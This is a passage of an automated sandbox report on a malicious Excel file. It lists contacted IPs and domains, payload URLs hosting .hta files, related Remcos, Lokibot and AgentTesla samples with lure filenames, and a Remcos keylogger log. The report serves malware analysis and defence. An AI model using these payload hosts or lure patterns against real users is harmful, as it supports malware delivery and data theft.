                                                                  https://secure.comodo.com/CPS0mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.524339714.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.000000000399C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://crl.entrust.net/2048ca.crl0mshta.exe, 00000004.00000002.455070536.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454355851.0000000003E95000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.454533372.0000000003E99000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.522035891.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.511274416.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000002.525079010.00000000039D3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000012.00000003.516936743.00000000039D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://provit.uk/VHbTI8?&thorn=gamy&mandolin=perfect&shoot=humdrum&chandelier=jagged&lacekmshta.exe, 00000004.00000002.454904762.00000000003E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      • Avira URL Cloud: safe
                                                                      		unknown

                                                                      World Map of Contacted IPs

                                                                      • No. of IPs < 25%
                                                                      • 25% < No. of IPs < 50%
                                                                      • 50% < No. of IPs < 75%
                                                                      • 75% < No. of IPs

                                                                      Public IPs

                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                      192.3.220.29
                                                                      		unknownUnited States
                                                                      		36352AS-COLOCROSSINGUStrue
                                                                      142.215.209.78
                                                                      		ip.1017.filemail.comCanada
                                                                      		32156HUMBER-COLLEGECAfalse
                                                                      192.3.101.149
                                                                      		banaya.duckdns.orgUnited States
                                                                      		36352AS-COLOCROSSINGUStrue
                                                                      198.244.140.41
                                                                      		provit.ukUnited States
                                                                      		18630RIDLEYSD-NETUSfalse
                                                                      178.237.33.50
                                                                      		geoplugin.netNetherlands
                                                                      		8455ATOM86-ASATOM86NLfalse

                                                                      General Information

                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                      Analysis ID:1559540
                                                                      Start date and time:2024-11-20 16:55:48 +01:00
                                                                      Joe Sandbox product:CloudBasic
                                                                      Overall analysis duration:0h 8m 24s
                                                                      Hypervisor based Inspection enabled:false
                                                                      Report type:full
                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                      Number of analysed new started processes analysed:35
                                                                      Number of new started drivers analysed:0
                                                                      Number of existing processes analysed:0
                                                                      Number of existing drivers analysed:0
                                                                      Number of injected processes analysed:0
                                                                      Technologies:
                                                                      • HCA enabled
                                                                      • EGA enabled
                                                                      • GSI enabled (VBA)
                                                                      • AMSI enabled
                                                                      Analysis Mode:default
                                                                      Analysis stop reason:Timeout
                                                                      Sample name:pi-77159.xls
                                                                      Detection:MAL
                                                                      Classification:mal100.rans.phis.troj.spyw.expl.evad.winXLS@39/51@13/5
                                                                      EGA Information:
                                                                      • Successful, ratio: 50%
                                                                      HCA Information:
                                                                      • Successful, ratio: 98%
                                                                      • Number of executed functions: 28
                                                                      • Number of non-executed functions: 186
                                                                      Cookbook Comments:
                                                                      • Found application associated with file extension: .xls
                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                      • Attach to Office via COM
                                                                      • Active ActiveX Object
                                                                      • Active ActiveX Object
                                                                      • Scroll down
                                                                      • Close Viewer

                                                                      Warnings

                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
                                                                      • Execution Graph export aborted for target mshta.exe, PID 3652 because there are no executed function
                                                                      • Execution Graph export aborted for target mshta.exe, PID 3844 because there are no executed function
                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                      • VT rate limit hit for: pi-77159.xls

                                                                      Simulations

                                                                      Behavior and APIs

                                                                      TimeTypeDescription
                                                                      10:57:19API Interceptor169x Sleep call for process: mshta.exe modified
                                                                      10:57:28API Interceptor628x Sleep call for process: powershell.exe modified
                                                                      10:57:40API Interceptor18x Sleep call for process: wscript.exe modified
                                                                      10:57:41API Interceptor90x Sleep call for process: AcroRd32.exe modified
                                                                      10:58:12API Interceptor714356x Sleep call for process: CasPol.exe modified

                                                                      Joe Sandbox View / Context

                                                                      IPs

                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      192.3.220.29New order.xlsGet hashmaliciousUnknownBrowse
                                                                      • 192.3.220.29/111/wed/chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta
                                                                      New order.xlsGet hashmaliciousUnknownBrowse
                                                                      • 192.3.220.29/111/wed/chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta
                                                                      New order.xlsGet hashmaliciousUnknownBrowse
                                                                      • 192.3.220.29/111/wed/chakarathingsaregreatpatternwelcomebacktotherealworldbaby.hta
                                                                      seemebestthingswhichevermadebybestthingsgodown.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                      • 192.3.220.29/66/SWRTFRR.txt
                                                                      CI.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                      • 192.3.220.29/66/SWRTFRR.txt
                                                                      142.215.209.78PO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                        seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                          Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                            bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                              #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                  Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                    kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                      bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                        Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                          192.3.101.149seemebestthingswhichevermadebybestthingsgodown.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                            CI.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                              seethebestthingswithgoodthingswithgreatthignsfor.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                1731343866c2de3056a60ef2333b3e4532593a69f279ecfa2002460801978b2e618aaa77bc130.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                  198.244.140.41Transferencia SPEI.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                    PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                      Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                        Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                          Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                            178.237.33.50sostener.vbsGet hashmaliciousRemcosBrowse
                                                                                                            • geoplugin.net/json.gp
                                                                                                            1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                            • geoplugin.net/json.gp
                                                                                                            USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                            • geoplugin.net/json.gp
                                                                                                            Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                            • geoplugin.net/json.gp
                                                                                                            USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                            • geoplugin.net/json.gp
                                                                                                            globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                            • geoplugin.net/json.gp
                                                                                                            file.exeGet hashmaliciousRemcosBrowse
                                                                                                            • geoplugin.net/json.gp
                                                                                                            YYHh9QU804.exeGet hashmaliciousRemcosBrowse
                                                                                                            • geoplugin.net/json.gp
                                                                                                            seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                            • geoplugin.net/json.gp
                                                                                                            FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                            • geoplugin.net/json.gp

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            ip.1017.filemail.comPO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 142.215.209.78
                                                                                                            seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                            • 142.215.209.78
                                                                                                            Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                            • 142.215.209.78
                                                                                                            bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                            • 142.215.209.78
                                                                                                            #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                            • 142.215.209.78
                                                                                                            seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                            • 142.215.209.78
                                                                                                            Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                            • 142.215.209.78
                                                                                                            kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                            • 142.215.209.78
                                                                                                            bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                            • 142.215.209.78
                                                                                                            Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                            • 142.215.209.78
                                                                                                            provit.ukTransferencia SPEI.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                            • 198.244.140.41
                                                                                                            PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                            • 198.244.140.41
                                                                                                            Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 198.244.140.41
                                                                                                            Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                            • 198.244.140.41
                                                                                                            Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                            • 198.244.140.41
                                                                                                            geoplugin.netsostener.vbsGet hashmaliciousRemcosBrowse
                                                                                                            • 178.237.33.50
                                                                                                            1732086011ea45d03916726c55fa40ae0b8f39b9a24a40da5a5e79d29c703a7fb444bdeb31407.dat-decoded.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 178.237.33.50
                                                                                                            USD470900_COPY_800BLHSBC882001_NOV202024.PDF.exeGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                            • 178.237.33.50
                                                                                                            Pago_BBVA.pdf.bat.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 178.237.33.50
                                                                                                            USD470900_COPY_800BLHSBC882001.PDF.batGet hashmaliciousRemcos, DBatLoaderBrowse
                                                                                                            • 178.237.33.50
                                                                                                            globe_product_order_korea_buy_20_11_2024_000000000000000000.vbsGet hashmaliciousGuLoader, RemcosBrowse
                                                                                                            • 178.237.33.50
                                                                                                            file.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 178.237.33.50
                                                                                                            YYHh9QU804.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 178.237.33.50
                                                                                                            seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                            • 178.237.33.50
                                                                                                            FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                            • 178.237.33.50

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            HUMBER-COLLEGECAPO 2725724312_pdf.vbsGet hashmaliciousUnknownBrowse
                                                                                                            • 142.215.209.78
                                                                                                            seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                            • 142.215.209.78
                                                                                                            Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                            • 142.215.209.78
                                                                                                            bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                            • 142.215.209.78
                                                                                                            #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                            • 142.215.209.78
                                                                                                            seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                            • 142.215.209.78
                                                                                                            Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                            • 142.215.209.78
                                                                                                            kissmegoodthingwhichgivemebestthignswithgirluaremy.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                            • 142.215.209.78
                                                                                                            bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaGet hashmaliciousCobalt Strike, HTMLPhisher, Lokibot, Strela StealerBrowse
                                                                                                            • 142.215.209.78
                                                                                                            Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                            • 142.215.209.78
                                                                                                            AS-COLOCROSSINGUSTransferencia SPEI.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                            • 107.173.4.61
                                                                                                            seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                            • 192.3.22.13
                                                                                                            greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                            • 192.3.243.136
                                                                                                            Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 172.245.123.3
                                                                                                            Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                            • 192.3.243.136
                                                                                                            Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                            • 192.3.22.13
                                                                                                            9srIKeD54O.rtfGet hashmaliciousUnknownBrowse
                                                                                                            • 192.3.101.150
                                                                                                            exe009.exeGet hashmaliciousEmotetBrowse
                                                                                                            • 75.127.14.170
                                                                                                            bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                            • 107.172.44.178
                                                                                                            givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                            • 192.3.243.136
                                                                                                            AS-COLOCROSSINGUSTransferencia SPEI.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                            • 107.173.4.61
                                                                                                            seethebestthingswithgreatsituationshandletotheprogress.htaGet hashmaliciousCobalt Strike, AgentTesla, HTMLPhisherBrowse
                                                                                                            • 192.3.22.13
                                                                                                            greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                            • 192.3.243.136
                                                                                                            Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 172.245.123.3
                                                                                                            Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                            • 192.3.243.136
                                                                                                            Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                            • 192.3.22.13
                                                                                                            9srIKeD54O.rtfGet hashmaliciousUnknownBrowse
                                                                                                            • 192.3.101.150
                                                                                                            exe009.exeGet hashmaliciousEmotetBrowse
                                                                                                            • 75.127.14.170
                                                                                                            bestthingsalwaysgetbesrentirelifethingstogdomybetterthignswithgreat.htaGet hashmaliciousCobalt Strike, HTMLPhisher, SmokeLoaderBrowse
                                                                                                            • 107.172.44.178
                                                                                                            givemebestwithentiretimegivenmebestthingsalwaysforgetbacknew.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                                            • 192.3.243.136
                                                                                                            RIDLEYSD-NETUSTransferencia SPEI.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                            • 198.244.140.41
                                                                                                            PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                            • 198.244.140.41
                                                                                                            Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 198.244.140.41
                                                                                                            Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                            • 198.244.140.41
                                                                                                            Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                            • 198.244.140.41
                                                                                                            nabspc.elfGet hashmaliciousUnknownBrowse
                                                                                                            • 198.244.7.173
                                                                                                            https://instagrambeta.github.io/Get hashmaliciousHTMLPhisherBrowse
                                                                                                            • 198.244.231.90
                                                                                                            SecuriteInfo.com.Trojan.WinGo.Agent.27329.6060.exeGet hashmaliciousUnknownBrowse
                                                                                                            • 198.244.179.42
                                                                                                            Informations.batGet hashmaliciousPureLog Stealer, XWormBrowse
                                                                                                            • 198.244.206.37
                                                                                                            Beopajki.exeGet hashmaliciousHVNC, PureLog Stealer, XWormBrowse
                                                                                                            • 198.244.206.37

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                            05af1f5ca1b87cc9cc9b25185115607dPO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                            • 142.215.209.78
                                                                                                            Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                            • 142.215.209.78
                                                                                                            Xkl0PnD8zFPjfh1.wiz.rtfGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                            • 142.215.209.78
                                                                                                            #U3010TW-S PO#U3011PO#3311-20241118003.xlsGet hashmaliciousHTMLPhisher, SmokeLoaderBrowse
                                                                                                            • 142.215.209.78
                                                                                                            Order_Summary.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                                                            • 142.215.209.78
                                                                                                            INV-#000497053.docGet hashmaliciousUnknownBrowse
                                                                                                            • 142.215.209.78
                                                                                                            Purchase order (1).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                            • 142.215.209.78
                                                                                                            Purchase order (2).xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                            • 142.215.209.78
                                                                                                            Document.xla.xlsxGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                            • 142.215.209.78
                                                                                                            http://xoilacxd.ccGet hashmaliciousUnknownBrowse
                                                                                                            • 142.215.209.78
                                                                                                            7dcce5b76c8b17472d024758970a406bTransferencia SPEI.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                                                            • 198.244.140.41
                                                                                                            PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                                            • 198.244.140.41
                                                                                                            Credit_DetailsCBS24312017918.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                                                            • 198.244.140.41
                                                                                                            PO-000041492.xlsGet hashmaliciousUnknownBrowse
                                                                                                            • 198.244.140.41
                                                                                                            Credit_DetailsCBS24312017915.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                            • 198.244.140.41
                                                                                                            PO-000041492.xlsGet hashmaliciousUnknownBrowse
                                                                                                            • 198.244.140.41
                                                                                                            Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                                            • 198.244.140.41
                                                                                                            Credit_DetailsCBS24312017915.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                            • 198.244.140.41
                                                                                                            Env#U00edo de Orden de Compra No. 43456435344657.xla.xlsxGet hashmaliciousAgentTesla, HTMLPhisherBrowse
                                                                                                            • 198.244.140.41
                                                                                                            PO-73375.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                            • 198.244.140.41

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\ProgramData\remcos\logs.dat

                                                                                                            Download File
                                                                                                            Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):244
                                                                                                            Entropy (8bit):3.479567364166589
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:rhlKlf4OlVlNpPWl5JWRal2Jl+7R0DAlBG4XOylRflgHtl1eWFredn1xlfaX8klb:6lfJlPNpK5YcIeeDAlTyFwfxNa/WAv
                                                                                                            MD5:3F72C4DC2F31D5081038E7DA1DF650F3
                                                                                                            SHA1:9EA37AA45BAF28F1D8DC49181C7A16CDE495AE34
                                                                                                            SHA-256:E2F33DA3D38FC85B63118F1039780F80C0777AC5F8E44F31D2495E2B40728D7D
                                                                                                            SHA-512:96D789F09771E32F5B95AC2894AAA27D1E3ADBF61DED5C5C68E3F781F09E16C8FD9661C09BE8A755CCF458167ED69306E9E20300EF387A9869DE81D3A3E34354
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
                                                                                                            Preview:....[.2.0.2.4./.1.1./.2.0. .1.0.:.5.8.:.1.2. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.M.i.c.r.o.s.o.f.t. .E.x.c.e.l.].........[.N.e.w. .T.a.b. .-. .G.o.o.g.l.e. .C.h.r.o.m.e.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):4742
                                                                                                            Entropy (8bit):4.8105940880640246
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:96:mCJ2Woe5Sgyg12jDs+un/iQLEYFjDaeWJ6KGcmXuFRLcU6/KI2k6Lm5emmXIG:Jxoe5+gkjDt4iWN3yBGH+dcU6CIVsm5D
                                                                                                            MD5:278C40A9A3B321CA9147FFBC6BE3A8A8
                                                                                                            SHA1:D795FC7D3249F9D924DC951DA1DB900D02496D73
                                                                                                            SHA-256:4EB0EAE13C3C67789AD8940555F31548A66F5031BF1A804E26EA6E303515259E
                                                                                                            SHA-512:E7222B41A436CE0BF8FA3D8E5EB8249D4D3985419D0F901F535375789F001B5929EF9B85C1D6802F0FBD5F722A52CB27021F87D076E69D92F46C7C3E894C6F00
                                                                                                            Malicious:false
                                                                                                            Preview:PSMODULECACHE.....8.......S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script............7...q...C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility\Microsoft.PowerShell.Utility.psd1m.......Remove-Variable........Convert-String........Trace-Command........Sort-Object........Register-Object

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):64
                                                                                                            Entropy (8bit):0.34726597513537405
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:Nlll:Nll
                                                                                                            MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                            SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                            SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                            SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                            Malicious:false
                                                                                                            Preview:@...e...........................................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswhichgivingbestopportunities[1].hta

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:HTML document, ASCII text, with very long lines (65536), with no line terminators
                                                                                                            Category:modified
                                                                                                            Size (bytes):368862
                                                                                                            Entropy (8bit):2.4734616558553384
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:192:436mm7epKXV0b8ECbC/lepKXV0b8LCbC/+UepKXV0b8GepKXV0b89CbC/yepKXVl:Y65Cb
                                                                                                            MD5:35B8D63EAD2EB58B7ED815BE7BCBF97F
                                                                                                            SHA1:88AE189165C612CC11E3A83CE322363698E21DAF
                                                                                                            SHA-256:886699A7B1F864A18F767B1F3C95D860BCED175C6E9BF2A5186119B698B5DE23
                                                                                                            SHA-512:047BFD03280A842C6527D4A0C41E2D593D3222D4617152FEBED39120184BE179A36F99374C8BCA7724B11DC78C8AF202A14F63E7DFE87FEFC53FFB510440FCDE
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: JoeSecurity_HtmlPhish_44, Description: Yara detected HtmlPhish_44, Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthignswhichgivingbestopportunities[1].hta, Author: Joe Security
